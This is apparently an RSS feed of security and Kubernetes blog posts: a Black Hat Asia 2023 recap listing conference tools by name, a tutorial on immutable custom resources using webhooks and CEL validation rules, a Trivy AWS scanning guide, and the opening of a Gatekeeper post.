<p>A fascinating topic that garnered significant interest was knowledge graph construction and semantic web-building techniques, which showcased innovative approaches to extract insights and understand the complex relationships between entities in the cyber landscape. The integration of LLM (Large Language Models) in cyber security proved to be a game-changer, unveiling new avenues for threat identification and malware detection.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1683883829374/c114d647-8ffd-4090-98fc-4d822d911aa0.jpeg" alt="Knowledge Graph Construction" /></p>
<p>Among the engaging sessions, the discussion on User Entity Behavior Analytics (UEBA) captured attention, showcasing its effectiveness in identifying suspicious behavioral patterns and aiding in detecting shoulder surfing attacks and malware infiltrations.</p>
<p>Throughout the conference, attendees were exposed to groundbreaking research and revelations. One particularly enthralling presentation explored the methods employed by criminals to compromise millions of mobile devices. The investigation unveiled intricate implant delivery and management systems, shedding light on the dark underbelly of compromised ROMs and their suspicious DEX files.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1683884859214/764f8a19-3069-46ec-844e-b5e28506c813.jpeg" alt="Compromised Mobile Devices" /></p>
<p>ROM compromise trends over the years.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1683884845946/a6aeea51-3c17-43f2-95ad-776a76481bbe.jpeg" alt /></p>
<p>The hackers behind these operations proved to be highly organized, establishing an elaborate network of operations and multiple business entities. Astonishingly, the group boasted the accomplishment of having 8.9 million active devices under their control at one point, displaying their audacious activities on their branded website.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684216350644/79196976-2d1f-4398-962c-e327b9b82bbe.jpeg" alt="Criminal Network" /></p>
<p>Furthermore, the conference shed light on the exploitation of internal undocumented services within AWS and Azure. The insightful presentation uncovered vulnerabilities in AWS Glue services, revealing jar files that contained information about unexposed services. The session also explored the hacking of managed data services, providing attendees with valuable insights into potential weaknesses in these cloud platforms.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684216611200/81c4d5ce-ff58-44f8-b442-c6c2ad0f5f93.jpeg" alt="AWS and Azure Exploitation" /></p>
<p>A high-level overview of the AWS Glue service hack.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684216709423/538cf08a-99cb-480f-ad19-2835f0768f89.jpeg" alt /></p>
<p>Another captivating talk focused on the exploitation of isolation in WPA3, exposing the vulnerabilities to deauthentication and sleep attacks. The session provided a deeper understanding of the intricacies of wireless security protocols, emphasizing the need for robust defenses against emerging threats.</p>
<h2 id="heading-showcasing-the-arsenal-of-innovation">Showcasing the Arsenal of Innovation</h2>
<p>The Black Hat Asia 2023 Arsenal exhibited a diverse range of cutting-edge tools and frameworks that captured the imagination of attendees. Some notable highlights included:</p>
<ul>
<li><p><a target="_blank" href="http://aadinternals.com">AADInternals</a>: An Azure AD and M365 hacking and administration toolkit.</p>
</li>
<li><p><a target="_blank" href="https://www.blackhat.com/asia-23/arsenal/schedule/index.html#purplesharp-automated-adversary-simulation-31336">Purplesharp</a>: An automated adversary simulation tool designed for Windows environments.</p>
</li>
<li><p><a target="_blank" href="https://github.com/namhyung/uftrace">uftrace</a>: A dynamic function tracing tool for C/C++/Rust programs.</p>
</li>
<li><p><a target="_blank" href="https://github.com/j3ssie/osmedeus">Osmedeus</a>: An all-in-one reconnaissance framework for building personalized reconnaissance systems.</p>
</li>
<li><p><a target="_blank" href="https://www.blackhat.com/asia-23/arsenal/schedule/index.html#bluemap---an-interactive-tool-for-azure-exploitation-30899">Bluemap</a>: An interactive tool tailored for Azure exploitation, enabling thorough assessments of Azure environments.</p>
</li>
<li><p><a target="_blank" href="https://github.com/yogeshojha/rengine">rengine</a>: An automated reconnaissance framework designed to gather information and identify potential vulnerabilities.</p>
</li>
<li><p><a target="_blank" href="https://github.com/secureworks/squarephish">squarephish</a>: An advanced phishing tool that combines the OAuth Device code authentication flow with QR codes for highly effective phishing attacks.</p>
</li>
<li><p><a target="_blank" href="https://github.com/ine-labs/ThreatSeeker">Threatseeker</a>: A threat-hunting tool that utilizes Windows event logs for comprehensive analysis and detection.</p>
</li>
<li><p><a target="_blank" href="https://github.com/BeichenDream/GodPotato">GodPotato</a>: A tool capable of escalating privileges using the ImpersonatePrivilege permission.</p>
</li>
<li><p><a target="_blank" href="https://github.com/gojek/CureIAM">CureIAM</a>: A solution designed to streamline the cleanup of over-permissioned IAM accounts in Google Cloud Platform (GCP) infrastructures.</p>
</li>
<li><p><a target="_blank" href="https://www.blackhat.com/asia-23/arsenal/schedule/index.html#poc-attack-against-flying-drone-31236">PoC against flying drone</a>: A proof-of-concept demonstration showcasing an attack against a flying drone.</p>
</li>
<li><p><a target="_blank" href="https://github.com/ytisf/PyExfil">PyExfil</a>: A Python package that enables data exfiltration from compromised systems.</p>
</li>
<li><p><a target="_blank" href="https://www.blackhat.com/asia-23/arsenal/schedule/index.html#faceless---deepfake-detection-31316">Faceless</a>: A deepfake detection tool, vital for combating the rise of synthetic media.</p>
</li>
</ul>
<h2 id="heading-empowering-cybersecurity-with-language-models">Empowering Cybersecurity with Language Models</h2>
<p>The conference also underscored the significant role of Language Models (LMs) in the realm of cybersecurity. LMs like GPT-3, GPT-4, LaMDA, BLOOM, XLNet, GPT-Neo, Ernie 3.0 Titan, Minerva, and LLaMA were recognized for their potential in various applications, including credential stuffing attacks and the extraction of Techniques, Tactics, and Procedures (TTPs) using ML models.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1683884484152/4d52006f-1c17-43fe-9ad4-d443ebc2b17b.jpeg" alt="LLMs in Cybersecurity" /></p>
<p>Behavioral analysis using User Entity Behavior Analytics (UEBA) was another area where LMs showcased their effectiveness, enabling the identification of malware attacks and anomalous user behavior. This breakthrough technology offered promising solutions for safeguarding digital ecosystems from evolving threats.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1683884746214/b231c6c5-81d4-457c-9365-9bb0d578a242.jpeg" alt="Behavioral Analysis with LLM" /></p>
<p>The powerful Network Operations Center (NOC) at Black Hat Asia 2023 demonstrated the vast amount of metrics collected to monitor and analyze network activity. These metrics provided invaluable insights into identifying potential security breaches and ensuring the continuous protection of critical infrastructure.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1683884390507/80957312-fdfa-4efc-b262-d48600fdd13b.jpeg" alt="Black Hat NOC" /></p>
<p>There were also some great hands-on sessions on RFID hacking, lock picking, deepfake detection &amp; a lot more. I picked a few locks 😉</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684409045167/e4a85e46-452c-4a61-ad08-0011a518541b.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-conclusion">Conclusion</h2>
<p>In conclusion, Black Hat Asia 2023 was an exceptional event that brought together cybersecurity professionals from around the globe. Attendees were treated to captivating presentations, enlightening discussions, and access to a diverse range of innovative tools and frameworks.</p>
]]></content:encoded></item><item><title><![CDATA[Kubernetes CRD validation with CEL and kubebuilder marker comments]]></title><description><![CDATA[Kubernetes comes with resources like Pods, Deployments, Configmaps, PersistentVolumes & many more. Kubernetes is extensible & allows users to create Custom Resources (CR). Before creating a CR, it's required to create a Custom Resource Definition (CR...]]></description><link>https://blog.rewanthtammana.com/kubernetes-crd-validation-with-cel-and-kubebuilder-marker-comments</link><guid isPermaLink="true">https://blog.rewanthtammana.com/kubernetes-crd-validation-with-cel-and-kubebuilder-marker-comments</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Go Language]]></category><category><![CDATA[Operators]]></category><category><![CDATA[Validation]]></category><category><![CDATA[kubebuilder]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Wed, 12 Oct 2022 11:01:44 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1665570079795/f3OUh3xqq.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Kubernetes comes with resources like Pods, Deployments, Configmaps, PersistentVolumes &amp; many more. Kubernetes is extensible &amp; allows users to create Custom Resources (CR). Before creating a CR, it's required to create a Custom Resource Definition (CRD) that will define the structure &amp; meta-attributes of the future resource.</p>
<blockquote>
<p>For example, the Prometheus Operator adds a "PrometheusRule" resource. Alerts can be defined and edited with <code>kubectl edit prometheusrule some-rule</code>.</p>
<p>- Natan Yellin, CEO Robusta.dev</p>
</blockquote>
<p>There are many ways to create CRDs for Kubernetes. You can write CRDs from scratch as well, but some amazing tools out there will scaffold the skeleton structure for you to make things easier. A few of them are <a target="_blank" href="https://github.com/kubernetes-sigs/kubebuilder">kubebuilder</a>, <a target="_blank" href="https://github.com/operator-framework/operator-sdk">operator-sdk</a>, etc.</p>
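<p>If kubebuilder isn't installed yet, the quick-start installation is roughly the following. The download URL pattern is taken from the kubebuilder book; double-check it against the current documentation before running.</p>
<pre><code class="lang-bash"># Download the kubebuilder binary for your OS/architecture
curl -L -o kubebuilder "https://go.kubebuilder.io/dl/latest/$(go env GOOS)/$(go env GOARCH)"
chmod +x kubebuilder
sudo mv kubebuilder /usr/local/bin/
</code></pre>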
<p>Kubernetes operators require you to define &amp; create CRDs. Often, when you develop operators, a basic requirement is validating the different fields in a CRD. Kubebuilder offers many ways to perform basic validations, like setting the maximum/minimum length of a field, marking a field as required/optional, etc.</p>
<p>Before Kubernetes 1.25, the only way to create complex validations in CRDs was to write &amp; deploy a validating webhook. Each CRD would have its own validating webhook deployment running on the system. This is an operational &amp; development overhead when you have to develop &amp; deploy numerous CRDs. This issue is addressed in the Kubernetes 1.25 release with the introduction of <a target="_blank" href="https://github.com/google/cel-spec">CEL (Common Expression Language)</a> validation rules. In this post, we will see the process of creating immutable CRDs before &amp; after the introduction of CEL in Kubernetes.</p>
<h2 id="heading-warning">Warning!!!</h2>
<p>Kindly note this feature is still in the beta phase &amp; is subject to change. The following sections assume you know the basics of Golang, Kubernetes, &amp; operator development.</p>
<h2 id="heading-task">Task</h2>
<p>In this demo, we will create an immutable CRD, i.e., no one can edit the object once the CR is created. If someone tries to edit it, the API server must reject the change &amp; throw an error.</p>
<p>For this demo, we will use kubebuilder. Code available here - <a target="_blank" href="https://github.com/rewanthtammana/crd-immutable-validation-webhook">rewanthtammana/crd-immutable-validation-webhook</a></p>
<h3 id="heading-crd-validation-in-kubernetes-123">CRD validation in Kubernetes 1.23</h3>
<p>As mentioned above, we need to create a webhook for validation. But before that, let's scaffold the skeleton.</p>
<ol>
<li><p>Create a Kubernetes 1.23 cluster</p>
</li>
<li><p>Create a repository &amp; initialize it with go mod.</p>
<pre><code class="lang-bash"> mkdir /tmp/one <span class="hljs-built_in">cd</span> /tmp/one go mod init one
</code></pre>
</li>
<li><p>Initialize kubebuilder</p>
<p> On M1,</p>
<pre><code class="lang-bash"> kubebuilder init --domain rewanthtammana.com --license none --owner <span class="hljs-string">"rewanthtammana"</span> --plugins=go/v4-alpha
</code></pre>
<p> Others,</p>
<pre><code class="lang-bash"> kubebuilder init --domain rewanthtammana.com --license none --owner <span class="hljs-string">"rewanthtammana"</span>
</code></pre>
</li>
<li><p>Create an API with <code>ImmutableKind</code>. Say yes to creating a controller &amp; resource.</p>
<pre><code class="lang-bash"> kubebuilder create api --version v1 --group validate --kind ImmutableKind
</code></pre>
</li>
<li><p>Create a webhook for validation</p>
<pre><code class="lang-bash"> kubebuilder create webhook --group validate --version v1 --kind ImmutableKind --programmatic-validation
</code></pre>
</li>
<li><p>Add the validating webhook logic to the codebase, <a target="_blank" href="https://github.com/rewanthtammana/crd-immutable-validation-webhook/blob/main/crd-validation-with-webhook/api/v1/immutablekind_webhook.go">api/v1/immutablekind_webhook.go</a>. In this case, we want our object to be immutable, so all update operations must be blocked.</p>
<pre><code class="lang-go"> <span class="hljs-comment">// ValidateUpdate implements webhook.Validator so a webhook will be registered for the type</span>
 <span class="hljs-function"><span class="hljs-keyword">func</span> <span class="hljs-params">(r *ImmutableKind)</span> <span class="hljs-title">ValidateUpdate</span><span class="hljs-params">(old runtime.Object)</span> <span class="hljs-title">error</span></span> {
 immutablekindlog.Info(<span class="hljs-string">"validate update"</span>, <span class="hljs-string">"name"</span>, r.Name)

 <span class="hljs-keyword">return</span> apierrors.NewForbidden(
     schema.GroupResource{
         Group:    <span class="hljs-string">"validate.rewanthtammana.com"</span>,
         Resource: <span class="hljs-string">"ImmutableKind"</span>,
     }, r.Name, &amp;field.Error{
         Type:     field.ErrorTypeForbidden,
         Field:    <span class="hljs-string">"*"</span>,
         BadValue: r.Name,
         Detail:   <span class="hljs-string">"Invalid value: \"object\": Value is immutable"</span>,
     },
 )
 }
</code></pre>
</li>
<li><p>The default webhook will not work out of the box because of certificate issues. The easiest fix is to install <code>cert-manager</code> to manage the certificates for you.</p>
<pre><code class="lang-bash"> kubectl apply -f https://github.com/cert-manager/cert-manager/releases/download/v1.9.1/cert-manager.yaml
</code></pre>
</li>
<li><p>Edit the scaffolded configuration to enable the webhook deployment, CA injection, etc., as in the next two steps</p>
</li>
<li><p>Uncomment <code>patches/webhook_in_immutablekinds.yaml</code> and <code>patches/cainjection_in_immutablekinds.yaml</code> in <a target="_blank" href="https://github.com/rewanthtammana/crd-immutable-validation-webhook/blob/main/crd-validation-with-webhook/config/crd/kustomization.yaml">config/crd/kustomization.yaml</a></p>
</li>
<li><p>Uncomment <code>../certmanager</code> and <code>../webhook</code> directories, <code>manager_webhook_patch.yaml</code> &amp; entire <code>CERTMANAGER</code> replacements block in <a target="_blank" href="https://github.com/rewanthtammana/crd-immutable-validation-webhook/blob/main/crd-validation-with-webhook/config/default/kustomization.yaml">config/default/kustomization.yaml</a></p>
</li>
<li><p>Create custom CRDs</p>
<pre><code class="lang-bash">make manifests
</code></pre>
</li>
<li><p>Build &amp; push the webhook code logic to dockerhub. In this case, I'm pushing the image to my personal dockerhub account for deployment. You can change the image name accordingly.</p>
<pre><code class="lang-bash">make docker-build docker-push IMG=rewanthtammana/immutablekindwebhook:v1
</code></pre>
</li>
<li><p>Install &amp; deploy the CRD &amp; webhook (a quick verification command is shown right after this list)</p>
<pre><code class="lang-bash">make install deploy IMG=rewanthtammana/immutablekindwebhook:v1
</code></pre>
</li>
<li><p>Deploy a sample CR.</p>
<pre><code class="lang-bash">kubectl apply -f ./config/samples/validate_v1_immutablekind.yaml
</code></pre>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">validate.rewanthtammana.com/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ImmutableKind</span>
<span class="hljs-attr">metadata:</span>
<span class="hljs-attr">labels:</span>
<span class="hljs-attr">app.kubernetes.io/name:</span> <span class="hljs-string">immutablekind</span>
<span class="hljs-attr">app.kubernetes.io/instance:</span> <span class="hljs-string">immutablekind-sample</span>
<span class="hljs-attr">app.kubernetes.io/part-of:</span> <span class="hljs-string">immutable-validation-webhook</span>
<span class="hljs-attr">app.kuberentes.io/managed-by:</span> <span class="hljs-string">kustomize</span>
<span class="hljs-attr">app.kubernetes.io/created-by:</span> <span class="hljs-string">immutable-validation-webhook</span>
<span class="hljs-attr">mutate:</span> <span class="hljs-string">maybe</span>
<span class="hljs-attr">name:</span> <span class="hljs-string">immutablekind-sample</span>
<span class="hljs-attr">spec:</span>
<span class="hljs-comment"># TODO(user): Add fields here</span>
</code></pre>
</li>
<li><p>To validate the immutability feature, let's edit the deployed CR.</p>
</li>
<li><p>To keep things simple, let's remove all labels from the above snippet &amp; just deploy the <code>immutablekind-sample</code> CR again.</p>
<pre><code class="lang-yaml"><span class="hljs-string">echo</span> <span class="hljs-string">"apiVersion: validate.rewanthtammana.com/v1
kind: ImmutableKind
metadata:
  name: immutablekind-sample"</span> <span class="hljs-string">|</span> <span class="hljs-string">kubectl</span> <span class="hljs-string">apply</span> <span class="hljs-string">-f-</span>
</code></pre>
</li>
<li><p>The Kubernetes API server should throw an error blocking the update.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1665314307178/20Zu36wl0.png" alt="image.png" /></p>
</li>
</ol>
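<p>As referenced in the install &amp; deploy step above, you can optionally confirm that the webhook machinery is in place before testing. These are standard kubectl commands; the exact resource and namespace names depend on your project name.</p>
<pre><code class="lang-bash"># The validating webhook configuration should have been created by the deployment
kubectl get validatingwebhookconfigurations

# The controller manager pod (which serves the webhook) should be running,
# typically in a namespace named &lt;project&gt;-system
kubectl get pods -A | grep controller-manager
</code></pre>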
<h3 id="heading-crd-validation-in-kubernetes-125">CRD validation in Kubernetes 1.25</h3>
<p>With the introduction of CEL, the complexity of implementing CRD validation drops significantly. The initial scaffolding steps remain the same.</p>
<ol>
<li><p>Create a Kubernetes 1.25 cluster</p>
</li>
<li><p>Create a repository &amp; initialize it with go mod.</p>
<pre><code class="lang-bash"> mkdir /tmp/two
 <span class="hljs-built_in">cd</span> /tmp/two
 go mod init two
</code></pre>
</li>
<li><p>Initialize kubebuilder</p>
<p> On M1,</p>
<pre><code class="lang-bash"> kubebuilder init --domain rewanthtammana.com --license none --owner <span class="hljs-string">"rewanthtammana"</span> --plugins=go/v4-alpha
</code></pre>
<p> Others,</p>
<pre><code class="lang-bash"> kubebuilder init --domain rewanthtammana.com --license none --owner <span class="hljs-string">"rewanthtammana"</span>
</code></pre>
</li>
<li><p>Create an API with <code>ImmutableKind</code>. Say yes to creating a controller &amp; resource.</p>
<pre><code class="lang-bash"> kubebuilder create api --version v1 --group validate --kind ImmutableKind
</code></pre>
</li>
<li><p>No need to create a webhook for CRD validation with CEL</p>
</li>
<li><p>We aren't validating a specific field in this task. We want to protect the entire object &amp; all its nested fields</p>
</li>
<li><p>The best way to achieve our goal is to embed the kubebuilder marker comments for the entire kind struct object</p>
</li>
<li><p>The CEL immutable validation check looks as below</p>
<pre><code class="lang-bash"> // +kubebuilder:validation:XValidation:rule=<span class="hljs-string">"self == oldSelf"</span>, message=<span class="hljs-string">"Value is immutable"</span>
</code></pre>
</li>
<li><p>The above marker comment is parsed by controller-gen to generate the CRDs. The <code>XValidation</code> marker translates to the <code>x-kubernetes-validations</code> field in the CRD</p>
</li>
<li><p>The validation rule specified above ensures that the new request object (<code>self</code>) is always equal to the previously deployed object (<code>oldSelf</code>). If they differ, the CEL validation rejects the request with the error message</p>
</li>
<li><p>A lot more granular validation on each field is possible with CEL. But it's not required for our demo use case</p>
</li>
<li><p>In this case, we created the <code>ImmutableKind</code> struct &amp; want to make sure its CRs are immutable. Add the above validation marker comment to the struct</p>
</li>
<li><p>The <code>ImmutableKind</code> struct exists in <a target="_blank" href="https://github.com/rewanthtammana/crd-immutable-validation-webhook/blob/main/crd-validation-with-markers/api/v1/immutablekind_types.go">api/v1/immutablekind_types.go</a></p>
<pre><code class="lang-go"><span class="hljs-comment">// +kubebuilder:validation:XValidation:rule="self == oldSelf", message="Value is immutable"</span>
<span class="hljs-keyword">type</span> ImmutableKind <span class="hljs-keyword">struct</span> {
metav1.TypeMeta   <span class="hljs-string">`json:",inline"`</span>
metav1.ObjectMeta <span class="hljs-string">`json:"metadata,omitempty"`</span>

Spec   ImmutableKindSpec   <span class="hljs-string">`json:"spec,omitempty"`</span>
Status ImmutableKindStatus <span class="hljs-string">`json:"status,omitempty"`</span>
}
</code></pre>
</li>
<li><p>Create custom CRDs &amp; install them</p>
<pre><code class="lang-bash">make manifests
make install
</code></pre>
</li>
<li><p>Deploy a sample CR</p>
<pre><code class="lang-bash">kubectl apply -f ./config/samples/validate_v1_immutablekind.yaml
</code></pre>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">validate.rewanthtammana.com/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ImmutableKind</span>
<span class="hljs-attr">metadata:</span>
<span class="hljs-attr">labels:</span>
<span class="hljs-attr">app.kubernetes.io/name:</span> <span class="hljs-string">immutablekind</span>
<span class="hljs-attr">app.kubernetes.io/instance:</span> <span class="hljs-string">immutablekind-sample</span>
<span class="hljs-attr">app.kubernetes.io/part-of:</span> <span class="hljs-string">immutable-validation-webhook</span>
<span class="hljs-attr">app.kuberentes.io/managed-by:</span> <span class="hljs-string">kustomize</span>
<span class="hljs-attr">app.kubernetes.io/created-by:</span> <span class="hljs-string">immutable-validation-webhook</span>
<span class="hljs-attr">mutate:</span> <span class="hljs-string">maybe</span>
<span class="hljs-attr">name:</span> <span class="hljs-string">immutablekind-sample</span>
<span class="hljs-attr">spec:</span>
<span class="hljs-comment"># TODO(user): Add fields here</span>
</code></pre>
</li>
<li><p>To validate the immutability feature, let's edit the deployed CR.</p>
</li>
<li><p>To keep things simple, let's remove all labels from the above snippet &amp; just deploy the <code>immutablekind-sample</code> CR again.</p>
<pre><code class="lang-yaml"><span class="hljs-string">echo</span> <span class="hljs-string">"apiVersion: validate.rewanthtammana.com/v1
kind: ImmutableKind
metadata:
  name: immutablekind-sample"</span> <span class="hljs-string">|</span> <span class="hljs-string">kubectl</span> <span class="hljs-string">apply</span> <span class="hljs-string">-f-</span>
</code></pre>
</li>
<li><p>The object update request will fail.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1665317010497/BQ3GVEVX5.png" alt="image.png" /></p>
</li>
</ol>
<h2 id="heading-peek-into-marker-comments-magic">Peek into marker comments magic</h2>
<p>Just a one-line marker comment removed all the complexity of creating a webhook deployment, managing certificates, deploying cert-manager, etc.</p>
<p>The CRD configuration is located in <a target="_blank" href="https://github.com/rewanthtammana/crd-immutable-validation-webhook/blob/main/crd-validation-with-markers/config/crd/bases/validate.rewanthtammana.com_immutablekinds.yaml#L50">./config/crd/bases/validate.rewanthtammana.com_immutablekinds.yaml</a></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1665317592248/XRgfoe5Ud.png" alt="image.png" /></p>
<p>The above marker comment embeds the <code>x-kubernetes-validations</code> field into the <code>openAPIV3Schema</code> when you generate the manifest files.</p>
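<p>To see the generated rule on a live cluster, you can dump the CRD and look for the <code>x-kubernetes-validations</code> block. A small sketch, assuming the default pluralization of the kind used in this demo:</p>
<pre><code class="lang-bash">kubectl get crd immutablekinds.validate.rewanthtammana.com -o yaml \
  | grep -B 2 -A 4 "x-kubernetes-validations"
</code></pre>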
<h2 id="heading-conclusion">Conclusion</h2>
<p>This is just the tip of the iceberg. We can achieve numerous other things with the combination of CEL &amp; Kubernetes. You can check the references for further usage.</p>
<h2 id="heading-references">References</h2>
<ul>
<li><p><a target="_blank" href="https://github.com/rewanthtammana/crd-immutable-validation-webhook/">Demo codebase</a></p>
</li>
<li><p><a target="_blank" href="https://github.com/google/cel-spec">CEL</a></p>
</li>
<li><p><a target="_blank" href="https://book.kubebuilder.io/">Kubebuilder</a></p>
</li>
<li><p><a target="_blank" href="https://kubernetes.io/blog/2022/09/29/enforce-immutability-using-cel/">Kubernetes Blog</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Trivy: Enhanced with AWS scan integration]]></title><description><![CDATA[Trivy is one of the most reliable open-source tools for image scanning. Primarily famous for its incredible image scanning, it also supports scanning Kubernetes clusters/resources, file systems & git repositories for misconfigurations & security vuln...]]></description><link>https://blog.rewanthtammana.com/trivy-enhanced-with-aws-scan-integration</link><guid isPermaLink="true">https://blog.rewanthtammana.com/trivy-enhanced-with-aws-scan-integration</guid><category><![CDATA[trivy]]></category><category><![CDATA[AWS]]></category><category><![CDATA[Security]]></category><category><![CDATA[DevSecOps]]></category><category><![CDATA[Developer]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Sun, 21 Aug 2022 08:43:23 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1661071750027/YbwVjne1P.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><a target="_blank" href="https://github.com/aquasecurity/trivy/">Trivy</a> is one of the most reliable open-source tools for image scanning. Primarily famous for its incredible image scanning, it also supports scanning Kubernetes clusters/resources, file systems &amp; git repositories for misconfigurations &amp; security vulnerabilities.</p>
<p>Thanks to <a target="_blank" href="https://twitter.com/urlichsanais">Anaïs Urlichs</a> for inviting me to the beta &amp; early adopters review.</p>
<p>As of Aug 15, 2022, Trivy is capable of scanning AWS resources for misconfigurations. A lesser-known fact is that <a target="_blank" href="https://www.aquasec.com/">aquasec</a> acquired <a target="_blank" href="https://github.com/aquasecurity/cloudsploit">cloudsploit</a>, a Cloud Security Posture Management (CSPM) tool that supports AWS, GCP, Azure, Oracle, etc. It even covers standards like HIPAA, PCI &amp; CIS benchmarks. However, cloudsploit hasn't received any updates since Aug 26, 2020. Nevertheless, Trivy can now perform the scans cloudsploit was capable of &amp; more.</p>
<h2 id="heading-hands-on">Hands-on</h2>
<p>Kindly note that this feature is still experimental. As of this writing, Trivy supports scanning 31 types of AWS resources for misconfigurations.</p>
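<p>Since this integration is evolving quickly, the most reliable way to see which services and flags your installed version supports is the built-in help.</p>
<pre><code class="lang-bash">trivy --version
trivy aws --help
</code></pre>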
<h3 id="heading-authenticate-to-aws-account">Authenticate to AWS account</h3>
<pre><code class="lang-bash">aws configure
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1661007750068/w50Zp8KQE.png" alt="aws-authentication.png" /></p>
<h3 id="heading-scan-all-resources-in-the-default-region">Scan all resources in the default region</h3>
<p>The region set during <code>aws configure</code> will be picked up! This returns the summary/count of misconfigurations for supported resources.</p>
<pre><code class="lang-bash">trivy aws
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1661007794388/r9d3cMOv5.png" alt="aws-scan-default-region.png" /></p>
<h3 id="heading-scan-all-resources-in-a-specific-region">Scan all resources in a specific region</h3>
<pre><code class="lang-bash">trivy aws --region=us-east-1
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1661007808954/S14wq58bk.png" alt="aws-scan-different-region.png" /></p>
<p>The list can be lengthy &amp; exhausting to go through. The <code>service</code> filter comes to the rescue.</p>
<h3 id="heading-scan-a-single-resource">Scan a single resource</h3>
<p>The service feature shows more information on the misconfigurations.</p>
<pre><code class="lang-bash">trivy aws --service=ec2
trivy aws --service=ec2 --region=eu-west-1
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1661007831350/ByF6Hx79a.png" alt="aws-scan-ec2.png" /></p>
<h3 id="heading-format-output">Format output</h3>
<p>Trivy supports multiple output formats: table, json, sarif, cosign-vuln, github, spdx, cyclonedx &amp; more.</p>
<p>The SARIF format lets us view the results in a more visual way.</p>
<pre><code class="lang-bash">trivy aws --service=s3 --format=sarif --output=aws-s3-output.sarif
</code></pre>
<p><strong>NOTE: If you have multiple misconfigurations/sensitive information in your output, DO NOT upload the results to an online website. Try setting up a local sarif viewer.</strong></p>
<p>I don't have any sensitive information in my output, so I'm uploading them to an online <a target="_blank" href="https://microsoft.github.io/sarif-web-component/">sarif viewer</a> from Microsoft. The output is clean &amp; simple to digest.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1661007925831/QafKTM4hd.png" alt="aws-s3-scan-sarif-ui-viewer.png" /></p>
<h3 id="heading-filter-results-based-on-vulnerability-severity">Filter results based on vulnerability severity</h3>
<pre><code class="lang-bash">trivy aws --service=s3
trivy aws --service=s3 --severity=MEDIUM
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1661007949744/glBHrM7si.png" alt="aws-scan-severity-filter.png" /></p>
<h3 id="heading-more-features">More features</h3>
<p>Trivy has several more features, like updating the local cache &amp; filters such as account, ARN, endpoint, etc.</p>
<h2 id="heading-references">References</h2>
<p><a target="_blank" href="https://aquasecurity.github.io/trivy/v0.31.0/docs/cloud/aws/scanning/">https://aquasecurity.github.io/trivy/v0.31.0/docs/cloud/aws/scanning/</a>
<a target="_blank" href="https://docs.aws.amazon.com/securityhub/latest/userguide/securityhub-standards-cis.html">https://docs.aws.amazon.com/securityhub/latest/userguide/securityhub-standards-cis.html</a></p>
<h2 id="heading-conclusion">Conclusion</h2>
<p>This is a massive enhancement from Trivy, integrating cloud/IaC scanning features into its arsenal. Though it's in the experimental phase, the scanning coverage &amp; features are impressive. We can expect Trivy to integrate more AWS-related features &amp; move on to other cloud provider integrations, making it a one-stop scanning tool.</p>
]]></content:encoded></item><item><title><![CDATA[Gatekeeper Rules Helm Library]]></title><description><![CDATA[With the deprecation of Pod Security Policies in Kubernetes 1.24 and the re-introduction of it as an admission controller which is still in the beta phase, it's complicated to use PSP/equivalent in larger organizations. We can use them but it's still...]]></description><link>https://blog.rewanthtammana.com/gatekeeper-rules-helm-library</link><guid isPermaLink="true">https://blog.rewanthtammana.com/gatekeeper-rules-helm-library</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[YAML]]></category><category><![CDATA[Helm]]></category><category><![CDATA[GitHub]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Sat, 18 Jun 2022 13:06:15 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1655554604515/OEwltVeNB.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>With the deprecation of Pod Security Policies in Kubernetes 1.24 and the re-introduction of it as an admission controller which is still in the beta phase, it's complicated to use PSP/equivalent in larger organizations. We can use them but it's still in the beta phase, so we aren't sure of the surprises Kubernetes is gonna bring us. So, what can we do about it?</p>
<h2 id="heading-introduction-to-admission-webhooks">Introduction to Admission Webhooks</h2>
<p><a target="_blank" href="https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/">Admission webhooks</a> in Kubernetes allows us to enforce policies to resource creations &amp; deployments. Some tools help us to write extensible policies to achieve better control over the environment like OPA Gatekeeper, Kyverno, etc.</p>
<h2 id="heading-challenges">Challenges</h2>
